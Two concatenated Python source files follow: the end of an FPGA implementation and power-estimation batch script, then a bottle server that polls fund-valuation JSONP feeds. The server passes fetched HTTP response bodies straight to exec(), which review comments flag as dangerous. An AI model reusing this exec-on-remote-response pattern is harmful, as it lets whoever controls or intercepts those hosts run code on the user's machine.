    vect_def = "\t\tconstant RWID : integer := " +str(in_wid) + ";"
    vect_def += "\n\t\tvariable " + vect + " : std_logic_vector(RWID-1 downto 0);"
    result = result.replace('--#Random_vector', vect_def)
    #Process
    # Slice the random vector bit-by-bit onto every data input each cycle
    v_i = in_wid-1
    proc = "\t\t\tset_random_value(" + vect + ");"
    for p in inputs:
        if len(p.dimensions) > 0:
            dmin = p.dimensions[0].get_min()
            dmax = p.dimensions[0].get_max()
            for i in range(dmax, dmin-1, -1):
                proc += "\n\t\t\t" + p.wire + "(" + str(i) + ")" + " <= " + vect + "(" + str(v_i) + ");"
                v_i -=1
        else:
            proc += "\n\t\t\t" + p.wire + " <= " + vect + "(" + str(v_i) + ");"
            v_i -= 1
    # NOTE(review): clock_port is assumed found here; a missing clock net
    # would raise AttributeError (pre-existing behavior).
    proc+="\n\t\t\twait until rising_edge(" + clock_port.wire + ");"
    result = result.replace('--#Process', proc)
    print(result)
    f = open(config.genconf.testbench_file,'w')
    f.write(result)
    f.close()
def get_active_proc_number(proclist):
    """Count entries of (process, ...) tuples whose process exists and is alive."""
    return sum(1 for entry in proclist
               if entry[0] is not None and entry[0].is_alive())
def proclist_stat(proclist):
    """Return (running, finished) counts over (process, ...) entries.

    Entries whose process slot is None are counted in neither bucket.
    """
    running = 0
    done = 0
    for entry in proclist:
        proc = entry[0]
        if proc is None:
            continue
        if proc.is_alive():
            running += 1
        else:
            done += 1
    return (running, done)
class ProcStatus(object):
    """Mutable key/value status record with a dirty flag and XML (de)serialization."""
    def __init__(self, tag='Noname'):
        self.data = dict()     # status fields: key -> value
        self.tag = tag         # XML element name used by to_xml/from_xml
        self.changed = True    # dirty flag: True when data differs from last export
    def copy(self, src):
        """Shallow-copy all fields, the tag and the dirty flag from src."""
        for k in list(src.data.keys()):
            self.data[k] = src.data[k]
        self.tag = src.tag
        self.changed = src.changed
    def update(self, key, val):
        """Set one field and mark the record dirty."""
        self.data[key] = val
        self.changed = True
    def set_mark(self, inmark):
        self.changed = inmark
    def get_mark(self):
        return self.changed
    def clear(self, keylist, initval='-'):
        """Reset every key in keylist to initval and mark the record dirty."""
        for k in keylist:
            self.data[k] = initval
        self.changed = True
    def to_str(self):
        """Render the fields as one "key : value, " sequence."""
        pieces = []
        for k, v in list(self.data.items()):
            pieces.append(str(k) + ' : ' + str(v) + ', ')
        return ''.join(pieces)
    def to_xml(self):
        """Render as an XML element whose attributes are the data fields."""
        parts = ['<' + self.tag + ' ']
        for k, v in list(self.data.items()):
            parts.append('\n\t' + str(k) + ' = "' + str(v) + '" ')
        parts.append(' >')
        parts.append('\n</' + self.tag + '>')
        return ''.join(parts)
    def from_xml(self, xmlroot, tag, key, val):
        """Load attributes from the first <tag> child whose `key` attribute equals val."""
        for node in xmlroot.findall(tag):
            if node.get(key, '') == val:
                for aname, avalue in node.attrib.items():
                    self.data[aname] = avalue
                self.tag = tag
                break
def save_statistics(statlist, statfile):
    """Write all status records to statfile as XML, plus a *_min.xml companion
    containing only records whose dirty mark is set (clearing the mark)."""
    header = '<?xml version="1.0"?>\n<data>'
    full = header
    for item in statlist:
        full += '\n\n' + item.to_xml()
    full += '\n</data>'
    with open(statfile, 'w') as out:
        out.write(full)
    #minimized stat file - export only changed items
    minimized = header
    for item in statlist:
        if item.get_mark():
            minimized += '\n\n' + item.to_xml()
            item.set_mark(False)
    minimized += '\n</data>'
    with open(statfile.replace('.xml', '_min.xml'), 'w') as out:
        out.write(minimized)
def recover_statistics(config_list, statfile, clear=False):
    """Build the per-configuration process-tracking dictionary.

    Returns ``dict[label] = (process_id=None, config_descriptor,
    statistic_descriptor)``, optionally re-populating each ProcStatus from a
    previously saved XML statistics file.

    :param config_list: configuration descriptors, each with a ``.label``.
    :param statfile: path of the XML statistics file to recover from.
    :param clear: when True, ignore any existing statistics file.
    """
    xml_root = None
    # Reload the previous run's statistics unless a clean slate was requested.
    if not clear and os.path.exists(statfile):
        xml_root = ET.parse(statfile).getroot()
    procdict = dict()
    for conf in config_list:
        status = ProcStatus('Config')
        if xml_root is not None:
            status.from_xml(xml_root, 'Config', 'Label', conf.label)
        status.update('Label', conf.label)
        procdict[conf.label] = (None, conf, status)
    return procdict
def copy_all_files(src, dst):
    """Copy every regular file found directly inside *src* into *dst*.

    Subdirectories are skipped; no recursion is performed.
    """
    for entry in os.listdir(src):
        candidate = os.path.join(src, entry)
        if not os.path.isfile(candidate):
            continue
        shutil.copy(candidate, dst)
#Entry point for the parent process.
#Parses the XML experiment configuration, implements each design configuration
#in a bounded pool of worker processes, optionally simulates switching
#activity for workload-accurate power estimation, and finally exports summary
#reports plus a config template for the SBFI tool.
#NOTE(review): this script uses Python 2 print statements — it requires a
#Python 2 interpreter as written.
if __name__ == '__main__':
    call_dir = os.getcwd()
    config_file_path = os.path.join(os.getcwd(), sys.argv[1])
    print "CONFIG PATH: " + config_file_path
    #1. Parse configuration file
    iconfig = sys.argv[1]
    tree = ET.parse(iconfig).getroot()
    # The <task> tag carries the global experiment options.
    tasktag = tree.findall('task')[0]
    maxproc = int(tasktag.get('max_proc'))  # maximum number of concurrent worker processes
    retry_attempts = int(tasktag.get('retry_attempts','0'))
    overwrite_flag = True if tasktag.get('overwrite_existing','') == 'on' else False
    implement_design = tasktag.get('implement_design','on')
    implement_default_config = True if tasktag.get('implement_default_config', 'on') == 'on' else False
    simulate_switching_activity = tasktag.get('simulate_switching_activity','on')
    only_update_testbench = tasktag.get('only_update_testbench','off')
    build_testbench_random_inputs = tasktag.get('build_testbench_random_inputs','off')
    first_index = tasktag.get('first_index','')
    last_index = tasktag.get('last_index','')
    print "Max Proc: " + str(maxproc)
    configurator = IoptionConfigurator()
    factorial_design = configurator.create_design(tree)
    genconf = configurator.genconf
    target_dir = os.path.join(call_dir, genconf.design_dir)
    # Global status records shown on the web statistics page.
    globalstatdict = dict()
    stat = ProcStatus('Global')
    stat.update('Phase', 'Implementation')
    if implement_design == 'on':
        stat.update('Progress', '0%')
        stat.update('Report', 'wait')
    else:
        stat.update('Progress', 'Not selected')
        stat.update('Report', '@[CSV@?./Logs/summary_power_estimated.csv]@, @[XML@?./Logs/summary_power_estimated.xml]@')
    globalstatdict['Implementation'] = stat
    stat = ProcStatus('Global')
    stat.update('Phase', 'Power Simulation')
    if simulate_switching_activity == "on":
        stat.update('Progress', '0%')
        stat.update('Report', 'wait')
    else:
        stat.update('Progress', 'Not selected')
        stat.update('Report', '@[CSV@?./Logs/summary_power_simulated.csv]@, @[XML@?./Logs/summary_power_simulated.xml]@')
    globalstatdict['Simulation'] = stat
    # Manager-backed proxies: worker processes update ProcStatus objects in place.
    BaseManager.register('ProcStatus', ProcStatus)
    manager = BaseManager()
    manager.start()
    #allocate User Interface and launch it - statistics page (web)
    copy_all_files(os.path.join(call_dir,'interface'), genconf.design_dir)
    try:
        if platform == 'linux' or platform == 'linux2':
            subprocess.check_output('xdg-open ' + os.path.join(call_dir, genconf.design_dir, 'index.html > ./dummylog.txt'), shell=True)
        elif platform == 'cygwin':
            subprocess.check_output('cygstart ' + os.path.join(call_dir, genconf.design_dir, 'index.html > ./dummylog.txt'), shell=True)
        elif platform == 'win32' or platform == 'win64':
            subprocess.check_output('start ' + os.path.join(call_dir, genconf.design_dir, 'index.html > ./dummylog.txt'), shell=True)
    except subprocess.CalledProcessError as e:
        print e.output
    #Determine range of configurations to work with
    if implement_default_config:
        ind_start = 0
    elif first_index != '':
        ind_start = int(first_index)
    else:
        ind_start = 1
    ind_end = int(last_index)+1 if last_index != '' else len(factorial_design.configurations)
    #Implement selected configurations
    procdict = recover_statistics(factorial_design.configurations, genconf.statfile, True)
    clk_adjusted_flag = False
    if implement_design == "on":
        timestart = datetime.datetime.now().replace(microsecond=0)
        # Mark every selected configuration as scheduled before launching.
        for i in range(ind_start, ind_end, 1):
            procdict[factorial_design.configurations[i].label][2].update('Progress', 'Scheduled')
            procdict[factorial_design.configurations[i].label][2].clear(['Iteration', 'Clock', 'Converged', 'Synthesis', 'Translate', 'Map', 'PlaceRoute', 'TimingAnalysis', 'NetlistBuilder', 'PowerAnalysis'])
        for i in range(ind_start, ind_end, 1):
            stat = manager.ProcStatus('Config') #shared proxy-object for process status monitoring
            stat.update('Label', factorial_design.configurations[i].label)
            #wait for resources for new process and update statistics
            while True:
                (active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
                globalstatdict['Implementation'].update('Progress', str('%.2f' % (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
                save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
                if active_proc_num < maxproc:
                    break
                time.sleep(5)
            globalstatdict['Implementation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
            # adjust initial clock period for future processes
            if not clk_adjusted_flag: #do it just once
                buf_clk = float(0)
                buf_cnt = int(0)
                for x in list(procdict.values()):
                    if x[0] != None: #if process has been launched
                        if x[0].exitcode != None: #and terminated, then we can retrieve the resulted clock period
                            if os.path.exists(os.path.join(target_dir, x[1].label, x[1].trace_report )):
                                with open(os.path.join(target_dir, x[1].label, x[1].trace_report), 'r') as f:
                                    content = f.read()
                                buf_clk += float(re.findall("Minimum period:\s*([0-9]+\.?[0-9]*)", content)[0])
                                buf_cnt += 1
                if buf_cnt > 0: #compute the mean clock period
                    genconf.clk_initial_period = norm_clk_period(buf_clk/float(buf_cnt))
                    print "CLK INITIAL PERIOD ADJUSTED: " + str(genconf.clk_initial_period)
                    # Stop adjusting once at least a fifth of the runs contributed.
                    if(buf_cnt > (ind_end - ind_start)/5): clk_adjusted_flag = True
            p = Process(target = implement_configuration, args = (factorial_design.configurations[i], target_dir, retry_attempts, overwrite_flag, stat))
            p.start()
            procdict[factorial_design.configurations[i].label] = (p, factorial_design.configurations[i], stat)
        #wait for completion and update statistics
        while True:
            (active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
            globalstatdict['Implementation'].update('Progress', str('%.2f'% (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
            save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
            if active_proc_num < 1:
                break
            time.sleep(5)
        globalstatdict['Implementation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
        if(not os.path.exists(genconf.tool_log_dir)):
            # NOTE(review): 'config.genconf' looks wrong here — every other line
            # uses the local 'genconf'; as written this likely raises NameError
            # whenever the log dir is missing. Confirm and use genconf.tool_log_dir.
            os.mkdir(config.genconf.tool_log_dir)
        summary = get_report_summary(genconf.log_dir + "/_par.log", factorial_design.configurations[0].trace_report, factorial_design.configurations[0].es_power_report, factorial_design, implement_default_config)
        with open(os.path.join(genconf.tool_log_dir, "summary_power_estimated.csv"), 'w') as summary_file:
            summary_file.write(summary.to_csv())
        with open(os.path.join(genconf.tool_log_dir, "summary_power_estimated.xml"), 'w') as summary_file:
            summary_file.write(summary.to_xml('Configuration'))
        globalstatdict['Implementation'].update('Report', '@[CSV@?./Logs/summary_power_estimated.csv]@, @[XML@?./Logs/summary_power_estimated.xml]@$ok')
        save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
    #Build testbench with random stimuli - if no functional testbench is provided
    if(build_testbench_random_inputs == "on"):
        if(os.path.isfile(os.path.join(call_dir, genconf.testbench_template_file))):
            tbfile = open(os.path.join(call_dir, genconf.testbench_template_file),'r')
            tb_template_content = tbfile.read()
            tbfile.close()
            print("Tesbench content: \n"+tb_template_content)
            for c in factorial_design.configurations:
                build_testbench(c, target_dir, tb_template_content)
        else:
            print("Testbench template file not found: " + os.path.join(call_dir, genconf.testbench_template_file))
    #Simulate switching activity (Isim) for workload-dependent (accurate) estimation of power consumption
    if(simulate_switching_activity == "on" or only_update_testbench == "on"):
        timestart = datetime.datetime.now().replace(microsecond=0)
        procdict = recover_statistics(factorial_design.configurations, genconf.statfile)
        for i in range(ind_start, ind_end, 1):
            procdict[factorial_design.configurations[i].label][2].update('Progress', 'Scheduled')
            procdict[factorial_design.configurations[i].label][2].clear(['Fuse_Compile', 'Simulation_ISIM', 'PowerAnalysis'])
        upf = True if only_update_testbench == "on" else False
        for i in range(ind_start, ind_end, 1):
            stat = manager.ProcStatus('Config') #shared proxy-object for process status monitoring
            stat.copy(procdict[factorial_design.configurations[i].label][2])
            #wait for resources for new process and update statistics
            while True:
                (active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
                globalstatdict['Simulation'].update('Progress', str('%.2f' % (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
                save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
                if active_proc_num < maxproc:
                    break
                time.sleep(5)
            globalstatdict['Simulation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
            p = Process(target = simulate_estimate_consumption, args = (factorial_design.configurations[i], target_dir, retry_attempts, upf, stat))
            p.start()
            procdict[factorial_design.configurations[i].label] = (p, factorial_design.configurations[i], stat)
        #wait for completion of all launched processes and update statistics
        while True:
            (active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
            globalstatdict['Simulation'].update('Progress', str('%.2f' % (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
            save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
            if active_proc_num < 1:
                break
            time.sleep(5)
        globalstatdict['Simulation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
        summary = get_report_summary(genconf.log_dir + "/_par.log", factorial_design.configurations[0].trace_report, factorial_design.configurations[0].saif_power_report, factorial_design, implement_default_config)
        with open(os.path.join(genconf.tool_log_dir, "summary_power_simulated.csv"), 'w') as summary_file:
            summary_file.write(summary.to_csv())
        with open(os.path.join(genconf.tool_log_dir, "summary_power_simulated.xml"), 'w') as summary_file:
            summary_file.write(summary.to_xml('Configuration'))
        globalstatdict['Simulation'].update('Report', '@[CSV@?./Logs/summary_power_simulated.csv]@, @[XML@?./Logs/summary_power_simulated.xml]@$ok')
        save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
    #build template for SBFI tool
    os.chdir(call_dir)
    config_content = "<data>"
    for c in factorial_design.configurations:
        cpi = get_implementation_properties(os.path.join(genconf.design_dir, c.label ,genconf.log_dir + "/_par.log"), os.path.join(genconf.design_dir, c.label , factorial_design.configurations[0].trace_report), os.path.join(genconf.design_dir, c.label , genconf.log_dir + "/estimated_power_" + genconf.top_design_unit + ".pwr"))
        config_content += "\n\n\t<config\n\t\twork_dir = \"" + genconf.design_dir + "/"+c.label + "\""
        config_content += "\n\t\tlabel = \"" + c.label + "\""
        config_content += "\n\t\tcompile_options = \"lib_on kh_off\""
        config_content += "\n\t\trun_options = \"kh_off\""
        config_content += "\n\t\tclk_period = \"" + str("%.1f" % norm_clk_period(cpi.minimum_period)) + "\""
        config_content += "\n\t\tstart_from = \"\""
        config_content += "\n\t\tstop_at = \"\""
        config_content += "\n\t/>"
    config_content += "</data>"
    config_pattern_file = open(os.path.join(genconf.tool_log_dir, "config_pattern.xml"), 'w')
    config_pattern_file.write(config_content)
    config_pattern_file.close()
    print("Completed")
|
start_server.py | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @Time : 2022/3/14 21:23
# @Author : dodo
# @Version:V 0.1
# @desc : 入口脚本
# gevent monkey-patching must run before any other imports so that blocking
# stdlib calls (sockets, sleeps) become cooperative for the gevent server.
from gevent import monkey
monkey.patch_all()
import os
import newest_jinzhi_mgr
import peak_valley_mgr
import threading
import requests
import json
import bottle
import valid_funds_db_mgr
from dz_utils.dz_utils import dict_set, write_json_file_breakline, dict_only_get, get_current_time, dict_get, print_2_file, time_str2int, time_int2str, read_json_file
# Latest estimate ("gz") payloads for every fund, keyed by fund code
# (populated by base_jsonpgz).
global_funds_gz_infos: dict = {}
# Static base-info rows for every monitored fund (loaded from the DB in
# start_monitor), keyed by fund code.
global_valid_funds_base_info_dict: dict = {}
# Exchange-traded fund data including volume and turnover.
global_inner_funds_advance_info_dict: dict = {}
def jsonpgz(the_fund_gz_info=None):
    """JSONP callback invoked by exec'd fundgz responses.

    Validates that the payload is a dict and forwards it to base_jsonpgz;
    malformed payloads are only logged.

    :param the_fund_gz_info: parsed estimate payload carrying a 'fundcode' key.
    """
    if not isinstance(the_fund_gz_info, dict):
        # Malformed payload — record it and bail out.
        print_2_file("./log/start_server.log",
                     f"{get_current_time()} jsonpgz_error! the_fund_gz_info:{the_fund_gz_info}")
        return
    base_jsonpgz(the_fund_gz_info.get("fundcode"), the_fund_gz_info)
def base_jsonpgz(the_fund_id: str, the_fund_gz_info: dict = None):
    """Normalize one fund's estimate payload, enrich it and cache it globally.

    Merges static base info (name, type, ratings, tags, ...) into the
    estimate payload, computes peak/valley ratios from the newest net value,
    and stores the result in global_funds_gz_infos under the fund id.

    :param the_fund_id: fund code.
    :param the_fund_gz_info: estimate payload from the fundgz endpoint, or
        None when the fund has no live estimate (a stub payload is built).
    """
    the_base_info: list = dict_only_get(global_valid_funds_base_info_dict, the_fund_id)
    # Positional layout of the base-info row — presumably fixed by
    # valid_funds_db_mgr; confirm against that module.
    the_fund_name: str = the_base_info[0]
    the_fund_type: str = the_base_info[1]
    the_fund_stock_rate: float = the_base_info[2]
    the_fund_money: float = the_base_info[3]
    zcgm = the_base_info[4]
    tags_str = the_base_info[5]
    select_stock = the_base_info[6]
    yield_rate = the_base_info[7]
    anti_risk = the_base_info[8]
    stability = the_base_info[9]
    select_time = the_base_info[10]
    hold_share = the_base_info[11]  # NOTE(review): read but unused below
    # the_pingzhongdata_info: dict = read_json_file(f"./pingzhongdata/{the_fund_id}.json")
    # Data_ACWorthTrend_list: list = dict_only_get(the_pingzhongdata_info, "Data_ACWorthTrend")
    # history_total_jinzhi_list: list = history_total_jinzhi_db_mgr.get_history_total_jinzhi_list(the_fund_id)
    if the_fund_gz_info is None:
        # No live estimate available — build a stub payload.
        the_fund_gz_info: dict = {}
        dict_set(the_fund_gz_info, "fundcode", the_fund_id)
        dict_set(the_fund_gz_info, "name", the_fund_name)
        # No estimated growth rate for this fund.
        dict_set(the_fund_gz_info, "gszzl", "0")
        dict_set(the_fund_gz_info, "gztime", "~~无即时估值")
    dict_set(the_fund_gz_info, "type", the_fund_type)
    dict_set(the_fund_gz_info, "stock_rate", the_fund_stock_rate)
    dict_set(the_fund_gz_info, "money", the_fund_money)
    dict_set(the_fund_gz_info, "tags", tags_str)
    dict_set(the_fund_gz_info, "select_stock", select_stock)
    dict_set(the_fund_gz_info, "yield_rate", yield_rate)
    dict_set(the_fund_gz_info, "anti_risk", anti_risk)
    dict_set(the_fund_gz_info, "stability", stability)
    dict_set(the_fund_gz_info, "select_time", select_time)
    dict_set(the_fund_gz_info, "zcgm", zcgm)
    gszzl_str: str = dict_get(the_fund_gz_info, "gszzl", "0")
    gszzl_float: float = float(gszzl_str) / 100
    # Today's growth delta of the unit net value.
    guzhi_delta: float = 0
    dwjz_str: str = dict_only_get(the_fund_gz_info, "dwjz")
    if gszzl_float != 0 and (dwjz_str is not None):
        dwjz_float: float = float(dwjz_str)
        guzhi_delta = dwjz_float * gszzl_float
    time_int, total_jingzhi = newest_jinzhi_mgr.get_newest_jinzhi(the_fund_id)
    # 20:00 - next day 09:30: today's net value has been published.
    # 09:30 - 20:00: only the estimate updates; the net value is stale.
    jzrq: str = dict_only_get(the_fund_gz_info, "jzrq")
    if jzrq is None:
        # No net-value date in the payload.
        vp_rate_200, vp_rate_100 = peak_valley_mgr.calc_peak_valley_rate(the_fund_id, float(total_jingzhi) + guzhi_delta)
        dict_set(the_fund_gz_info, "vp_rate_200", vp_rate_200)
        dict_set(the_fund_gz_info, "vp_rate_100", vp_rate_100)
        dict_set(global_funds_gz_infos, the_fund_id, the_fund_gz_info)
        return
    jzrq_int: int = time_str2int(jzrq, "%Y-%m-%d")
    # presumably: when the cached net value is >40000s newer than the payload's
    # jzrq date, it already includes today's growth, so the delta is not added
    # again — TODO confirm the 40000 threshold's intent.
    if time_int - jzrq_int > 40000:
        vp_rate_200, vp_rate_100 = peak_valley_mgr.calc_peak_valley_rate(the_fund_id, float(total_jingzhi))
        log_str: str = f"{get_current_time()} calc_vp {the_fund_id}, time_int:{time_int2str(time_int, '%Y%m%d_%H%M%S')}, total_jingzhi:{total_jingzhi}, the_fund_gz_info:{the_fund_gz_info}"
        print_2_file("./log/calc_vp.log", log_str)
    else:
        vp_rate_200, vp_rate_100 = peak_valley_mgr.calc_peak_valley_rate(the_fund_id, float(total_jingzhi) + guzhi_delta)
    dict_set(the_fund_gz_info, "vp_rate_200", vp_rate_200)
    dict_set(the_fund_gz_info, "vp_rate_100", vp_rate_100)
    dict_set(global_funds_gz_infos, the_fund_id, the_fund_gz_info)
def start_monitor():
    """Background loop: load fund state, then refresh all funds forever.

    Runs in a worker thread (see __main__). Each pass persists the in-memory
    caches to JSON so a restart can resume from the last snapshot.
    """
    global global_valid_funds_base_info_dict
    global global_funds_gz_infos
    global global_inner_funds_advance_info_dict
    global_valid_funds_base_info_dict = valid_funds_db_mgr.get_all_valid_funds_info_dict()
    print(f"len(global_valid_funds_dict):{len(global_valid_funds_base_info_dict)}")
    # Initialize global_funds_gz_infos and global_inner_funds_advance_info_dict
    # from the JSON snapshots of a previous run, when they exist.
    file_path: str = "json/global_funds_gz_infos.json"
    if os.access(file_path, os.F_OK):
        global_funds_gz_infos = read_json_file(file_path)
    file_path: str = "json/global_inner_funds_advance_info_dict.json"
    if os.access(file_path, os.F_OK):
        global_inner_funds_advance_info_dict = read_json_file(file_path)
    while True:
        monitor_once()
        # Persist both caches after every pass so progress survives a restart.
        write_json_file_breakline("json/global_funds_gz_infos.json", global_funds_gz_infos)
        write_json_file_breakline("./json/global_inner_funds_advance_info_dict.json", global_inner_funds_advance_info_dict)
        log_str: str = f"{get_current_time()} monitor_once finish"
        print_2_file("./log/start_server.log", log_str)
        # time.sleep(60 * 60 * 24)
        # time.sleep(60)
def refresh_inner_funds_advance_info():
    """Bulk-refresh advance info (volume/turnover) for exchange-traded funds.

    Pulls board listings from the eastmoney "clist" API; the responses are
    JSONP that call inner_funds_callback(...), and are executed directly so
    the callback stores every record into the global dict.

    SECURITY NOTE(review): exec() on a fetched HTTP body executes arbitrary
    remote code; replace by stripping the JSONP wrapper and using json.loads().
    """
    # LOF boards — one convenient call refreshes all of them at once.
    url: str = f'http://17.push2.eastmoney.com/api/qt/clist/get?cb=inner_funds_callback&pn=1&pz=160&po=1&np=1&ut=bd1d9ddb04089700cf9c27f6f7426281&fltt=2&invt=2&fid=f5&fs=b:MK0404,b:MK0405,b:MK0406,b:MK0407&fields=f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f12,f13,f14,f15,f16,f17,f18,f20,f21,f23,f24,f25,f22,f11,f62,f128,f136,f115,f152&_=1646113137838.js'
    response = requests.get(url=url)
    the_text: str = response.text
    exec(the_text)
    print(f"{get_current_time()}, refresh inner_funds_lof, len_text:{len(the_text)}")
    # ETF boards are paginated — fetch four pages of 200 entries each.
    for the_page in [1, 2, 3, 4]:
        url: str = f"http://40.push2.eastmoney.com/api/qt/clist/get?cb=inner_funds_callback&pn={the_page}&pz=200&po=0&np=1&ut=bd1d9ddb04089700cf9c27f6f7426281&fltt=2&invt=2&fid=f12&fs=b:MK0021,b:MK0022,b:MK0023,b:MK0024&fields=f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f12,f13,f14,f15,f16,f17,f18,f20,f21,f23,f24,f25,f22,f11,f62,f128,f136,f115,f152&_=1646634598896"
        response = requests.get(url=url)
        the_text: str = response.text
        exec(the_text)
        print(f"{get_current_time()}, refresh inner_funds_etf, page_no:{the_page} len_text:{len(the_text)}")
def inner_funds_callback(the_dict: dict):
    """Process one page of exchange-traded fund data.

    Every record found under ``data.diff`` is stored into the global
    advance-info dict, keyed by the fund id in field "f12".

    :param the_dict: decoded JSONP response object.
    :return:
    """
    the_data: dict = dict_only_get(the_dict, "data")
    the_diff_list: list[dict] = dict_only_get(the_data, "diff")
    print(f"{get_current_time()}, inner_funds_callback, len_the_diff_list:{len(the_diff_list)}")
    for record in the_diff_list:
        fund_id: str = dict_only_get(record, "f12")
        dict_set(global_inner_funds_advance_info_dict, fund_id, record)
def refresh_base_time() -> tuple[str, str]:
    """Refresh reference funds and derive the newest net-value date and estimate time.

    Polls three reference funds (000001/000006/000008) and takes the maximum
    of their net-value dates ("jzrq") and estimate timestamps ("gztime") as
    the site-wide reference times.

    The original repeated the fetch/parse logic three times per field; this
    version folds the duplication into loops over the reference fund ids.

    :return: tuple ``(max_jzrq, max_gztime)`` formatted as "%Y-%m-%d" and
        "%Y-%m-%d %H:%M" respectively.
    """
    reference_fund_ids = ("000001", "000006", "000008")
    # 1. Refresh the reference funds so their cached gz info is current.
    for fund_id in reference_fund_ids:
        monitor_the_fund(fund_id)
    gz_infos = [dict_only_get(global_funds_gz_infos, fund_id)
                for fund_id in reference_fund_ids]
    # Newest net-value date across the reference funds.
    max_jzrq_timestamp: int = max(
        time_str2int(dict_only_get(info, "jzrq"), "%Y-%m-%d") for info in gz_infos)
    max_jzrq: str = time_int2str(max_jzrq_timestamp, "%Y-%m-%d")
    # Newest estimate time across the reference funds.
    max_gztime_timestamp: int = max(
        time_str2int(dict_only_get(info, "gztime"), "%Y-%m-%d %H:%M") for info in gz_infos)
    max_gztime: str = time_int2str(max_gztime_timestamp, "%Y-%m-%d %H:%M")
    return max_jzrq, max_gztime
def monitor_once():
    """Run one full refresh pass over every monitored fund."""
    newest_jinzhi_mgr.refresh_all_jinzhi()
    max_jzrq, max_gztime = refresh_base_time()
    refresh_inner_funds_advance_info()
    inner_ids = global_inner_funds_advance_info_dict.keys()
    valid_ids = global_valid_funds_base_info_dict.keys()
    # Exchange-traded funds first: they come from the bulk feed.
    for fund_id in inner_ids:
        if fund_id in valid_ids:
            jsonpgz_inner_fund(fund_id, max_jzrq, max_gztime)
    # Remaining (open-ended) funds are polled individually.
    for fund_id in global_valid_funds_base_info_dict:
        if fund_id in inner_ids:
            continue
        try:
            monitor_the_fund(fund_id)
        except Exception as exc:
            # One failing fund must not abort the whole pass — log and move on.
            print_2_file("./log/start_server_exception.log",
                         f"{get_current_time()} exception! cur_fund_id:{fund_id}, e:{exc}")
def jsonpgz_inner_fund(the_fund_id: str, max_jzrq: str, max_gztime: str):
    """Assemble an estimate payload for an exchange-traded fund.

    Uses the bulk exchange feed (global_inner_funds_advance_info_dict)
    instead of the per-fund HTTP endpoint, then delegates to base_jsonpgz.

    :param the_fund_id: fund code.
    :param max_jzrq: site-wide newest net-value date ("%Y-%m-%d").
    :param max_gztime: site-wide newest estimate time ("%Y-%m-%d %H:%M").
    """
    # TODO: tag inner funds as well; closed or suspended funds also need automatic tags.
    base_info: list = dict_only_get(global_valid_funds_base_info_dict, the_fund_id)
    advance_info: dict = dict_only_get(global_inner_funds_advance_info_dict, the_fund_id)
    fund_name: str = base_info[0]
    # f18: yesterday's closing unit net value.
    prev_close_jinzhi: float = dict_only_get(advance_info, "f18")
    # f2: current latest price; f3: change rate ("-" when unavailable).
    latest_price: float = dict_only_get(advance_info, "f2")
    change_rate: float = dict_only_get(advance_info, "f3")
    if change_rate == "-":
        change_rate = 0
    payload: dict = {}
    dict_set(payload, "fundcode", the_fund_id)
    dict_set(payload, "name", fund_name)
    dict_set(payload, "jzrq", max_jzrq)
    dict_set(payload, "dwjz", prev_close_jinzhi)
    dict_set(payload, "gsz", latest_price)
    dict_set(payload, "gszzl", change_rate)
    dict_set(payload, "gztime", max_gztime)
    base_jsonpgz(the_fund_id, payload)
    # log_str: str = f"{get_current_time()} jsonpgz_inner_fund! cur_fund_id:{the_fund_id}, the_fund_gz_info:{payload}"
    # print_2_file("./log/start_server.log", log_str)
def monitor_the_fund(the_fund_id):
    """Fetch one fund's live estimate from fundgz and feed it into the cache.

    The endpoint answers with JSONP of the form ``jsonpgz({...});``; executing
    it invokes jsonpgz() above, which delegates to base_jsonpgz.

    :param the_fund_id: fund code.
    """
    url = f'http://fundgz.1234567.com.cn/js/{the_fund_id}.js'
    response = requests.get(url=url)
    the_text: str = response.text
    if "fundcode" not in the_text:
        # No estimate data for this fund — log it and cache a stub payload.
        log_str: str = f"{get_current_time()} jsonpgz_error! cur_fund_id:{the_fund_id}, the_fund_gz_info:{the_text}"
        print_2_file("./log/start_server.log", log_str)
        base_jsonpgz(the_fund_id)
        return
    if str.startswith(the_text, "jsonpgz("):
        log_str: str = the_text
        print_2_file("./log/start_server.log", log_str)
        # SECURITY NOTE(review): exec() of a fetched HTTP body is dangerous —
        # the original comment agrees ("should switch to a regular-expression
        # based parse instead"). Replace with a regex/JSON parse of the wrapper.
        exec(the_text)
        # Sample response:
        # jsonpgz({"fundcode": "013081", "name": "...", "jzrq": "2021-09-14", "dwjz": "2.2340", "gsz": "2.2480", "gszzl": "0.63", "gztime": "2021-09-15 15:00"});
@bottle.route('/getFund', method='GET')
def get_fund():
    """HTTP handler: dump every cached fund estimate payload as JSON."""
    payload = global_funds_gz_infos
    return json.dumps(payload, ensure_ascii=False)
@bottle.route('/editTags', method='GET')
def edit_tags():
    """HTTP handler: replace the tag string of one fund.

    Query params: ``fund_id`` and ``new_tags``.  Updates the in-memory base
    info, the cached estimate payload, and the database.
    """
    # TODO: add an ignore feature and a merge feature.
    fund_id: str = bottle.request.query.fund_id
